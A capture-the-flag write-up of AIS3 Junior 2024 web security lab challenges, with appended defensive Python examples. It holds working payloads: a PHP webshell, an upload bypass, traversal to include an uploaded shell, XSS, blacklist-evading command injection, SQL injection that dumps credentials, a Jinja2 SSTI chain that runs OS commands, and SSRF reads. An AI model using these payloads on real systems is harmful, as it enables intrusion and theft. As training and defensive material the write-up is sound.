# AIS3 Junior 2024 Web Security

y1w3n

> Web Security
> Date: 8/16
> Instructor: 徐牧遠 Red

# 01 - Broken Access Control

## BAC01

### Challenge description

![image](https://hackmd.io/_uploads/S1bnHH390.png)

After entering, it looks like this:

![image](https://hackmd.io/_uploads/BkvyUB3cC.png)

### <font color="#F7A004">solve</font>

Enter as admin and the site still treats us as an ordinary user: the URL path is ```/user```.

![image](https://hackmd.io/_uploads/Byqeyjn9C.png)

Because the role is carried in the URL, ==change it to admin== and the flag appears.

![image](https://hackmd.io/_uploads/By1U1i35C.png)

### answer

:::warning
AIS3_Junior{FirstBROKENAccessControl;)}
:::

### note

* The page never really verifies who is logged in: the role comes from the URL path (`/user` vs `/admin`) instead of from the server-side session, so any user can promote themselves by editing the path.

---

## BAC02

### Challenge description

![image](https://hackmd.io/_uploads/H11iboh5R.png)

After entering, it looks like this:

![image](https://hackmd.io/_uploads/ry2aWs250.png)

Under Product there are items you can buy:

![image](https://hackmd.io/_uploads/SyPfzin9A.png)

### <font color="#F7A004">solve</font>

Click into each product and watch the ID in the URL.

:::spoiler Screenshots ||hidden because they would flood the page||
![image](https://hackmd.io/_uploads/rJlpzjnq0.png)
1
![image](https://hackmd.io/_uploads/r1vJXjncR.png)
2
![image](https://hackmd.io/_uploads/rJQZXs350.png)
3
![image](https://hackmd.io/_uploads/HkUHmo3c0.png)
5
![image](https://hackmd.io/_uploads/HJkvmohqR.png)
6
:::

==There is no 4==. Guessing that the missing ID hides the FLAG, request it directly:

![image](https://hackmd.io/_uploads/By-ami2qC.png)

The server returns any product ID you ask for, listed or not (an IDOR), so the FLAG can now be bought for $0.

### answer

![image](https://hackmd.io/_uploads/r1YzVs2cR.png)

:::warning
AIS3_Junior{BroJustFoundBabyIDORVulnerability}
:::

# 02 - File Upload

## FIL01

### Challenge description

![image](https://hackmd.io/_uploads/B19FLr3cC.png)

After entering, it looks like this:

![image](https://hackmd.io/_uploads/B1ikPS3qC.png)

There is a place to upload files:

![image](https://hackmd.io/_uploads/SyFIDSh5C.png)

### <font color="#F7A004">solve</font>

* **php webshell**

```php
<?php system($_GET['cmd']); ?>
```

* ```system()``` is a PHP function that runs an operating-system command. It writes the command's output straight to the browser and returns the last line of that output.
* ```$_GET['cmd']``` is PHP's superglobal holding the value of the ```cmd``` query parameter in the URL.

Upload a file with the contents above.

![image](https://hackmd.io/_uploads/SykQOBhqA.png)

The upload succeeds but there is no FLAG yet. Note the message underneath: File upload to ==/uploads/c3644_108.160.138.201.php==

Open that path directly and you get this screen:

![image](https://hackmd.io/_uploads/r1eDtSnqC.png)

Append ```/?cmd=id``` to the URL. ```id``` can be replaced with any Linux command; start with ```ls``` to see what is there.
![image](https://hackmd.io/_uploads/HyN6wL3cR.png)

Nothing that looks like a FLAG here, so look elsewhere: ```ls ../```

![image](https://hackmd.io/_uploads/S15gdIh5R.png)

There is the FLAG. cat it: ```cat ../FLAG```

![image](https://hackmd.io/_uploads/SkADd8390.png)

### answer

:::warning
AIS3_Junior{FirstWEBSHELLXDDD}
:::

### note

* Running system commands through the web page is RCE (remote code execution)
* Done with the most basic PHP webshell, uploaded as-is
* ```/?cmd=id```: ```cmd``` is the query parameter; ```id``` prints the UID, GID and groups of the user the web server runs as

---

## FIL02

### Challenge description

![image](https://hackmd.io/_uploads/HJByjIh9C.png)

Same as the previous challenge, but with some restrictions added; the upload gets blocked.

![image](https://hackmd.io/_uploads/HyqH3Un9C.png)

### <font color="#F7A004">solve</font>

Open Burp and intercept the request before it is uploaded.

![image](https://hackmd.io/_uploads/HJXNxOhcC.png)

Change Content-Type: ```application/x-php``` to ```image/jpg``` and send.

![image](https://hackmd.io/_uploads/Bkw_AD2cR.png)

The response reports where the file was uploaded. The check only looks at the client-supplied Content-Type header, which we control, so the .php file goes through. Open it as in the previous challenge.

![image](https://hackmd.io/_uploads/B1Djuah9R.png)

### answer

:::warning
AIS3_Junior{BabyUploadBypass}
:::

# 03 - Local File Inclusion

## LFI01

### Challenge description

![image](https://hackmd.io/_uploads/rJ0yCQ69R.png)

After entering, it looks like this:

![image](https://hackmd.io/_uploads/rJLdCXp90.png)

Typing a few things in just throws an ERROR.

### <font color="#F7A004">solve</font>

```Ctrl+U``` to view the page source.

![image](https://hackmd.io/_uploads/H191F_aqA.png)

Follow the link in the HTML comment.

![image](https://hackmd.io/_uploads/By9wy80cC.png)

Nothing there. Searching online, index.php usually holds the most information, so ==change what follows ```file=``` to index.php==.

![image](https://hackmd.io/_uploads/H1tJsvR5R.png)

Now the page source shows the **Account** (admin) and **Password** (CATLOVEBITCOINMEOWMEOW). Go back to the starting URL (http://ctfd-ais3.crazyfirelee.tw:9021/) and log in with them.

![image](https://hackmd.io/_uploads/BJUJavA50.png)

### answer

:::warning
AIS3_Junior{php://filter/BabyPHPLFI.b64decode()}
:::

### note

* index.php is the default page of the application and holds its main logic and configuration, so it is rarely exposed in the URL. The flag name hints at how the read works: through the ```php://filter``` wrapper with base64 encoding, the server returns the PHP source (encoded) instead of executing it, and decoding it exposes the credentials.

---

## LFI02

### Challenge description

![image](https://hackmd.io/_uploads/S1uvRpCq0.png)

![image](https://hackmd.io/_uploads/SyQfW00cC.png)

### <font color="#F7A004">solve</font>

After uploading a file the page shows: File upload to /tmp/c3644_108.160.138.201.php

![image](https://hackmd.io/_uploads/Bkj2EAC9A.png)

Go back to the upload page and change what follows form= to ```../../../../../tmp/c3644_108.160.138.201.php&cmd=ls```
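Why that `form=` value ends up in `/tmp`, as an added example (not part of the write-up or the challenge code): a Python replay of the path arithmetic behind the include, next to the containment check post.php should have done. `INCLUDE_DIR` is an assumption; the real directory post.php includes from is not known from the challenge.

```python
"""Path traversal behind LFI02, replayed with Python's path rules.

Added example for the LFI02 write-up; not the challenge code. INCLUDE_DIR is
an assumption standing in for wherever post.php includes its forms from.
"""
import posixpath
from urllib.parse import parse_qs, urlsplit

INCLUDE_DIR = "/var/www/html/forms"  # assumed; the real directory is unknown


def vulnerable_resolve(form: str) -> str:
    """Mimics include(INCLUDE_DIR . '/' . $_GET['form']): the user's string is
    glued on and the OS collapses every '..', climbing out of INCLUDE_DIR."""
    return posixpath.normpath(INCLUDE_DIR + "/" + form)


def hardened_resolve(form: str) -> str:
    """Normalise first, then refuse anything whose normalised path is not
    inside INCLUDE_DIR. A plain string-prefix check would accept
    '/var/www/html/forms-evil/x.php'; commonpath does not."""
    candidate = posixpath.normpath(posixpath.join(INCLUDE_DIR, form))
    if posixpath.commonpath([INCLUDE_DIR, candidate]) != INCLUDE_DIR:
        raise ValueError(f"path escapes {INCLUDE_DIR}: {form!r}")
    return candidate


def depth(path: str) -> int:
    """How many '../' are needed to reach '/' from path. Extra '../' beyond
    that are harmless because normpath clamps at the root, which is why a
    generous count such as the write-up's five always works."""
    return len([p for p in path.split("/") if p])


def parse_attack_url(url: str) -> tuple[str, str]:
    """Split the two parameters of the final URL: 'form' is consumed by
    post.php's include(), 'cmd' by the webshell that the include executes."""
    query = parse_qs(urlsplit(url).query)
    return query["form"][0], query.get("cmd", [""])[0]


if __name__ == "__main__":
    payload = "../../../../../tmp/c3644_108.160.138.201.php"
    print(vulnerable_resolve(payload))
    try:
        hardened_resolve(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

Note that `posixpath.join(INCLUDE_DIR, "/tmp/x.php")` discards the base entirely when the second part is absolute, so the containment check has to run on the normalised result, not on the input string.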
![image](https://hackmd.io/_uploads/S1FxwC0qC.png)

Something that looks like the FLAG shows up: S3Cr3TFLAGGGGG

```
http://ctfd-ais3.crazyfirelee.tw:9022/post.php?form=../../../../../tmp/c3644_108.160.138.201.php&cmd=cat%20S3Cr3TFLAGGGGG
```

![image](https://hackmd.io/_uploads/By3Q_0CcC.png)

### answer

:::warning
AIS3_Junior{../../../../tmp/BADBAD.php?LFI=SUCCESS}
:::

### note

* ```../``` walks out of the directory the application restricts includes to; including a file we uploaded ourselves turns the LFI into code execution

# 04 - Cross-Site Scripting

## XSS01

### Challenge description

![image](https://hackmd.io/_uploads/rkEV9u6qC.png)

![image](https://hackmd.io/_uploads/H1YDqdp5A.png)

### <font color="#F7A004">solve</font>

```<script>alert(FLAG);</script>```

![image](https://hackmd.io/_uploads/HyaQs_aq0.png)

### answer

:::warning
AIS3_Junior{XSSXSSXSSXSS}
:::

### note

[Reference](https://tech-blog.cymetrics.io/posts/jo/zerobased-cross-site-scripting/)

* Reflected XSS
* The most common kind
* The malicious script arrives via the URL or a form submission, is reflected straight back into the page and executed, and is never stored

# 05 - Command Injection

## CMD01

### Challenge description

![image](https://hackmd.io/_uploads/ByVVJKaqA.png)

![image](https://hackmd.io/_uploads/Sy0A42TqR.png)

After entering localhost:

![image](https://hackmd.io/_uploads/HJ_mB365R.png)

### <font color="#F7A004">solve</font>

After a ```;``` we can append a shell command:

![image](https://hackmd.io/_uploads/HJyRHnp5A.png)

The listing shows a FLAG file. Enter ```localhost;cat FLAG``` and get the answer.

![image](https://hackmd.io/_uploads/r1AiLh650.png)

### answer

:::warning
AIS3_Junior{BabyCommand;InjectionXDDDddddd}
:::

### note

* localhost (127.0.0.1) is a valid target, so the application's own ping runs normally and our command runs after it
* Command chaining
* ```;```: ends the current command and starts the next one

---

## CMD02

### Challenge description

![image](https://hackmd.io/_uploads/r1zXunpc0.png)

Inside it is the same as CMD01, but appending a command the way we did before ==gets blocked==, because the input contains something on the blacklist.

![image](https://hackmd.io/_uploads/SJ7cIWRcR.png)

### <font color="#F7A004">solve1</font>

```
;ca\t${IFS}FLAG
```

![image](https://hackmd.io/_uploads/S1igY-R9C.png)

### <font color="#F7A004">solve2</font>

```
;grep${IFS}-r${IFS}AIS3
```

![image](https://hackmd.io/_uploads/H1Qw_WC5A.png)

### <font color="#F7A004">solve3</font>

```
11&python${IFS}*
```

![image](https://hackmd.io/_uploads/HyBvYZ0q0.png)

### answer

:::warning
AIS3_Junior{niceWordBL$()ACKListEvasion;)}
:::

### note

* ```${IFS}```: the shell's internal field separator, whitespace by default, so it stands in for a blocked space
* ```ca\t```: the shell drops the backslash, so ```cat``` runs even though the literal string ```cat``` never appears in the input
* ```grep${IFS}-r${IFS}AIS3```: search every file for the flag prefix instead of naming the flag file
* ```11&python${IFS}*```: ```11&``` sends the ping into the background so the rest of the line is still executed; ```*``` expands to the files in the working directory, python tries to run the first one as a script, and the error it prints quotes the offending line, which leaks that file's contents

---

## CMD03 & [Bonus] CMD06

### Challenge description

(These two are basically identical, so they are written up together.)

:::spoiler Challenges in CTFd
![image](https://hackmd.io/_uploads/SyQ7pb0qA.png)
![image](https://hackmd.io/_uploads/SyPEpbA5C.png)
:::

![image](https://hackmd.io/_uploads/Hkv2TbCq0.png)

Inside it is the same PING IP page, again with a blacklist.

### <font color="#F7A004">solve</font>

```
11|ca\t${IFS}FLAG
```

CMD03: ![image](https://hackmd.io/_uploads/BJNjUfCqA.png)

CMD06: ![image](https://hackmd.io/_uploads/BJh7vGR9A.png)

### answer

:::warning
CMD03: ```AIS3_Junior{BashOperato|rEvasion${IFS}SUCC|ESSFUL|:DDDDD}```
CMD06: ```AIS3_Junior{ouo_hihi}```
:::

### note

* ```|```: the pipe is another command separator; when the blacklist catches ```;```, the pipe still gets the second command executed. ```cat FLAG``` ignores the ping output arriving on its stdin because it was given a file name.

# 06 - SQL Injection

## SQL01

### Challenge description

![image](https://hackmd.io/_uploads/ryxXhuf05R.png)

Inside is a login page.

![image](https://hackmd.io/_uploads/r1_etzRqC.png)

### <font color="#F7A004">solve</font>

* Account: ```'OR 1=1-- ```
* Password: ```aaa``` (anything works)

![image](https://hackmd.io/_uploads/HJ_1qzA9C.png)

### answer

![image](https://hackmd.io/_uploads/S1YE9fAqA.png)

:::warning
AIS3_Junior{SQL'InjectionXDorD=D_--_-}
:::

### note

* ```'OR 1=1--```: 1=1 is always true and ```--``` comments out the rest of the query, so whatever is typed into Password has no effect

[More reading](https://tech-blog.cymetrics.io/posts/nick/sqli/)

![image](https://hackmd.io/_uploads/rkD8ofC9R.png)

---

## SQL02

### Challenge description

![image](https://hackmd.io/_uploads/rJjCsfC9R.png)

Inside, this is the interface:

![image](https://hackmd.io/_uploads/r1yI0M0cR.png)

### <font color="#F7A004">solve</font>

First find out how many columns the query returns; it turns out to be 4.

![image](https://hackmd.io/_uploads/SJ4PRM0qR.png)

![image](https://hackmd.io/_uploads/S1DK440qR.png)

We don't know the database, table or column names yet, so read them from information_schema:

```sql
aaa' UNION SELECT 1 ,group_concat(schema_name) ,3 ,4 FROM information_schema.schemata#
```

![image](https://hackmd.io/_uploads/B1kIk11s0.png)

That gives ==table_schema='ApexPredators'==

```sql
aaa' UNION SELECT 1 ,group_concat(table_name) ,3 ,4 FROM information_schema.tables WHERE table_schema='ApexPredators'#
```
![image](https://hackmd.io/_uploads/S1SDfy1oC.png)

That finds ==table_name='users'==

```sql
aaa' UNION SELECT 1 ,group_concat(column_name) ,3 ,4 FROM information_schema.columns WHERE table_schema='ApexPredators' and table_name='users'#
```

![image](https://hackmd.io/_uploads/rJp9M1kjC.png)

```sql
aaa' UNION SELECT 1 ,isAdmin ,password ,username FROM ApexPredators.users#
```

![image](https://hackmd.io/_uploads/BJjg7ykiA.png)

This gives:

* Account: KubenBlisk
* Password: BliskLeader#2024

Go back to the Login page and log in.

![image](https://hackmd.io/_uploads/SJX27JJj0.png)

### answer

![image](https://hackmd.io/_uploads/ryYO7kJsC.png)

:::warning
AIS3_Junior{_BRO-DO_A--UNION_SELECTXDDD_--_-}
:::

### note

* UNION joins two SELECT statements that return the same number of columns
* ```aaa' UNION SELECT 1 ,group_concat(schema_name) ,3 ,4```: both SELECTs run; the first finds no row called aaa and returns nothing, then the second, ```SELECT 1 ,group_concat(schema_name) ,3 ,4 FROM information_schema.schemata#```, fills the page with its result
* information_schema.schemata: lists the names of all databases

# 07 - Server-Side Template Injection

## STI01 & STI02

### Challenge description

(Same method, so written up together.)

![image](https://hackmd.io/_uploads/HJxTLmFAcA.png)

![image](https://hackmd.io/_uploads/BkmRM5C5R.png)

Again "Who are you", asking us to enter something.

![image](https://hackmd.io/_uploads/r1cKXK090.png)

Trying admin does nothing.

![image](https://hackmd.io/_uploads/SkUc9FC5R.png)

The BAC01 trick of changing ```/user``` to ```/admin``` just says we have no permission.

### <font color="#F7A004">solve</font>

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}
```

The directory listing comes back, including FLAG:

![image](https://hackmd.io/_uploads/BJmD3FR9R.png)

Go back and replace ```ls``` with ```cat FLAG```:

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat FLAG').read() }}
```

![image](https://hackmd.io/_uploads/ByxCx9C50.png)

### answer

:::warning
STI01: ```AIS3_Junior{.__JinjaTWOOOO.___["SSTI"]__.succ3ssXDD.__}```
STI02: ```AIS3_Junior{b4by__.filt3rEvasion.__Succ3ss}```
:::

### note

* SSTI in Jinja2
* The payload can go into the username parameter: ```http://example.com/?username={{7*7}}```. A page with an SSTI vulnerability then responds with Hi 49
* ``{{}}`` is Jinja2's expression delimiter; whatever it wraps is evaluated at render time and the result substituted in, so ``{{7*7}}`` renders as 49
* Confirming that this page has SSTI: ![image](https://hackmd.io/_uploads/Hk4qG505A.png)

# 08 - Server-Side Request Forgery

## SRF01

### Challenge description

![image](https://hackmd.io/_uploads/S1thV50cC.png)

![image](https://hackmd.io/_uploads/ByX5w60qC.png)

### <font color="#F7A004">solve</font>

The challenge text gives Flag Location: /app/FLAG, so ask the server to fetch it directly:

```
File:///app/FLAG
```

On the next page the Image does not display, so open ```f12``` and look.

![image](https://hackmd.io/_uploads/r1NzdTA9R.png)

![image](https://hackmd.io/_uploads/SJlctTA9R.png)

The image source is a base64 string; copy it out and decode it.

![image](https://hackmd.io/_uploads/S1phtTAcA.png)

### answer

:::warning
AIS3_Junior{file://SSRF___XDDD}
:::

### note

* SSRF happens when an application lets the user specify a URL or resource and the server itself makes the request to fetch it; the server's side of that fetch reaches things the user cannot, such as local files or internal hosts

---

## SRF02

### Challenge description

![image](https://hackmd.io/_uploads/BJvh5TA9R.png)

![image](https://hackmd.io/_uploads/BJaWsa0c0.png)

There is a cool admin panel in the top right. Clicking it shows ==LOCAL ACCESS ONLY==

![image](https://hackmd.io/_uploads/Hynwi60cC.png)

### <font color="#F7A004">solve</font>

Given **LOCAL ACCESS ONLY**, the guess is that this is about localhost, so make the server fetch its own admin panel:

```
http://localhost/local
```

![image](https://hackmd.io/_uploads/BkFqe7pc0.png)

Again the Image does not display, so ```ctrl```+```u``` and look.

![image](https://hackmd.io/_uploads/r1162TRcC.png)

Again a base64 string; copy it out and decode it.

![image](https://hackmd.io/_uploads/H11J6aRqA.png)

### answer

:::warning
AIS3_Junior{http://BROAccessLOCAL}
:::

### note

* ```http://localhost/local``` points at the server itself. Because the server makes the request, it arrives from 127.0.0.1 and passes the "local access only" check that blocked our browser.
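A stand-in for the SRF01/SRF02 image fetcher, as an added example that is not the challenge's code: it shows why `file:///app/FLAG` and `http://localhost/local` both come back as base64 inside an `<img>` tag, and an allow-list check that would have refused both. `FAKE_BACKEND` and `fake_resolve` are constructed so nothing touches the network; the real fetcher would use an HTTP client and `socket.gethostbyname`.

```python
"""SSRF in the SRF01/SRF02 image fetcher and the check that stops it.

Added example, not the challenge's code. FAKE_BACKEND / fake_resolve are
constructed stand-ins so the module runs offline.
"""
import base64
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed stand-in for "what the server would get back if it fetched URL".
FAKE_BACKEND = {
    "file:///app/FLAG": b"constructed-flag-contents",
    "http://localhost/local": b"<h1>admin panel (local only)</h1>",
    "http://img.example/cat.png": b"\x89PNG\r\n\x1a\n...",
}


def fake_read(url: str) -> bytes:
    return FAKE_BACKEND[url]


def fake_resolve(hostname: str) -> str:
    """Constructed DNS: img.example is public, localhost is loopback, and IP
    literals resolve to themselves."""
    return {"img.example": "8.8.8.8", "localhost": "127.0.0.1"}.get(hostname, hostname)


def vulnerable_fetch(url: str, read=fake_read) -> str:
    """What both challenges do: fetch whatever URL the user gave and embed the
    bytes as a data: URI in <img src=...>. Any scheme, any host."""
    return "data:image/png;base64," + base64.b64encode(read(url)).decode()


def decode_img(data_uri: str) -> bytes:
    """The F12 / Ctrl+U step of the write-up: pull the base64 back out."""
    return base64.b64decode(data_uri.split(",", 1)[1])


def is_public_http_url(url: str, resolve=socket.gethostbyname) -> bool:
    """Allow-list: http(s) only (kills file://), and the host must resolve to
    a globally routable address (kills localhost, 127.0.0.1, 10/8,
    169.254.169.254, ::1 and friends)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return False
    try:
        addr = ipaddress.ip_address(resolve(parts.hostname))
    except (socket.gaierror, ValueError):
        return False
    return addr.is_global


def hardened_fetch(url: str, read=fake_read, resolve=socket.gethostbyname) -> str:
    if not is_public_http_url(url, resolve):
        raise ValueError(f"refusing to fetch {url!r}")
    return vulnerable_fetch(url, read)


if __name__ == "__main__":
    print(decode_img(vulnerable_fetch("file:///app/FLAG")))
    print(is_public_http_url("http://localhost/local", fake_resolve))
```

Two things the check alone does not cover: resolve the name once and connect to that address (otherwise a DNS answer can change between the check and the fetch), and re-run the check on every redirect hop, since a public host can 302 to `http://127.0.0.1/local`.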
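Back to FIL01/FIL02: the Content-Type-only check that the Burp edit defeated, next to a check that ignores the header and validates the file itself. This is an added example, not the challenge's code; `weak_check` reconstructs the behaviour observed, and the allow-lists, sample uploads and magic bytes are constructed.

```python
"""FIL02's upload check versus one that cannot be talked around with Burp.

Added example, not the challenge's code. weak_check is a reconstruction of
the observed behaviour (only the Content-Type header is inspected); the
allow-lists and sample uploads are constructed.
"""
import os
import secrets

WEBSHELL = b"<?php system($_GET['cmd']); ?>"   # the FIL01 payload
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC, ".png": PNG_MAGIC}
MAX_BYTES = 5 * 1024 * 1024


def weak_check(filename: str, content_type: str, data: bytes) -> bool:
    """What FIL02 appears to do: trust the Content-Type the client sent.
    Name and contents are never looked at, so shell.php with
    Content-Type: image/jpg sails through and the server runs it as PHP."""
    return content_type.lower() in ("image/jpeg", "image/jpg", "image/png")


def strong_check(filename: str, content_type: str, data: bytes) -> bool:
    """Ignore Content-Type (the client chooses it). Decide from the extension
    allow-list, the file's own magic bytes, a size cap, and an explicit
    refusal of PHP tags hidden inside an otherwise valid image."""
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED_EXT.get(ext)
    if magic is None or len(data) > MAX_BYTES:
        return False
    if not data.startswith(magic):
        return False
    if b"<?php" in data or b"<?=" in data:   # image/PHP polyglot
        return False
    return True


def storage_name(filename: str) -> str:
    """Never reuse the client's name: random name, extension taken from the
    allow-list. Store it outside the web root (or where PHP execution is
    disabled) so even a missed case cannot be executed by requesting it."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext!r}")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print(weak_check("shell.php", "image/jpg", WEBSHELL))      # the Burp bypass
    print(strong_check("shell.php", "image/jpg", WEBSHELL))
    print(storage_name("cat.png"))
```

The polyglot line matters because magic bytes alone are easy to satisfy: prepend `\xff\xd8\xff` to the webshell and a magic-only check accepts it, and if that file is then served from a directory where PHP runs, the extension is the only thing left between the attacker and RCE.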
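For CMD01 through CMD03, an added example (not the challenge's code) of three things: a keyword blacklist of the kind the challenges used, a function that shows what bash actually runs once `${IFS}` and the backslash in `ca\t` are processed, and the allow-list-plus-argv approach that removes the bug instead of filtering it. The two blacklists are assumptions chosen to be consistent with the write-up's payloads (CMD02 let `;` through, CMD03 did not); the real lists are not known.

```python
"""Why the CMD02/CMD03 payloads pass a blacklist, and the fix that needs none.

Added example, not the challenge's code. The two blacklists are assumptions
consistent with the payloads in the write-up, not the challenge's real lists.
"""
import ipaddress
import re
import shlex
import subprocess
import sys

CMD02_BLACKLIST = ["cat", " "]                  # assumed
CMD03_BLACKLIST = CMD02_BLACKLIST + [";", "&"]  # assumed
_SEPARATORS = re.compile(r"\s*(?:\|\||&&|;|\||&)\s*")
_HOSTNAME = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")


def blocked(user_input: str, blacklist: list[str]) -> bool:
    """Substring blacklist, the only defence the challenge had."""
    return any(bad in user_input for bad in blacklist)


def shell_would_run(user_input: str) -> list[str]:
    """The commands bash executes for `ping -c 1 <input>` under sh -c.
    Two pieces of bash are reproduced: ${IFS} expands to a space, and
    shlex applies POSIX quoting, which is what turns ca\\t into cat."""
    expanded = f"ping -c 1 {user_input}".replace("${IFS}", " ")
    return [" ".join(shlex.split(part))
            for part in _SEPARATORS.split(expanded) if part.strip()]


def safe_ping_argv(target: str) -> list[str]:
    """The fix: validate the target as an IP literal or plain hostname and
    pass it as one argv element with no shell, so ';', '|', '${IFS}' and '\\'
    are never interpreted. Refusing a leading '-' stops argument injection."""
    try:
        target = str(ipaddress.ip_address(target))
    except ValueError:
        if not _HOSTNAME.match(target):
            raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "1", target]


if __name__ == "__main__":
    print(shell_would_run(";ca\\t${IFS}FLAG"))
    argv = safe_ping_argv(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1")
    print(subprocess.run(argv, capture_output=True, text=True).stdout)
```

`shell_would_run` is deliberately not a full bash parser; it only reproduces the two expansions the write-up relies on, which is enough to see that every payload in CMD02 and CMD03 becomes a plain `cat FLAG` (or `grep -r AIS3`, or `python *`) by the time the shell executes it.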
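For STI01/STI02, an added example (not the challenge's code) of why the payload works: a plain-Python walk of the `self.__init__.__globals__.__builtins__.__import__` chain using a constructed stand-in class for Jinja2's `self`, and, when Jinja2 is installed, the vulnerable render next to `SandboxedEnvironment`, which refuses the underscore-prefixed attribute the payload starts with.

```python
"""How the STI01/STI02 payload reaches os, and the Jinja2 sandbox that stops it.

Added example, not the challenge's code. TemplateContext is a constructed
stand-in for Jinja2's TemplateReference (the object bound to `self` in a
template); the Jinja2 functions only run if the library is installed.
"""


class TemplateContext:
    """Any class whose __init__ is ordinary Python exposes the globals of the
    module that defined it: bound_method.__globals__ is that module's dict."""

    def __init__(self):
        self.name = "self"


def gadget_chain(obj):
    """Python equivalent of
    self.__init__.__globals__.__builtins__.__import__('os')
    Each hop is an attribute or item lookup the template engine does for us."""
    module_globals = obj.__init__.__globals__
    builtins = module_globals["__builtins__"]
    # __builtins__ is the builtins module inside __main__ but a plain dict
    # inside any imported module (jinja2.runtime included); handle both.
    import_fn = builtins["__import__"] if isinstance(builtins, dict) else builtins.__import__
    return import_fn("os")


def run_via_chain(obj, command: str) -> str:
    """The .popen(command).read() tail of the payload."""
    return gadget_chain(obj).popen(command).read()


def render(template_source: str, sandboxed: bool = False) -> str:
    """Render with jinja2.Environment (what the challenge did) or with
    SandboxedEnvironment, whose getattr rejects names starting with '_',
    so the very first hop (self.__init__) raises SecurityError."""
    import jinja2
    from jinja2.sandbox import SandboxedEnvironment

    env = SandboxedEnvironment() if sandboxed else jinja2.Environment()
    try:
        return env.from_string(template_source).render()
    except jinja2.exceptions.SecurityError as exc:
        return f"SecurityError: {exc}"


PROBE = "{{ 7*7 }}"
PAYLOAD = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}"

if __name__ == "__main__":
    print(run_via_chain(TemplateContext(), "ls"))
    print(render(PROBE), render(PAYLOAD, sandboxed=True))
```

The sandbox is the right fix only when user input genuinely must be a template; when it is just a name to greet, pass it as a variable (`render(name=user_input)`) and keep the template text fixed, and no `{{ }}` the user types is ever evaluated.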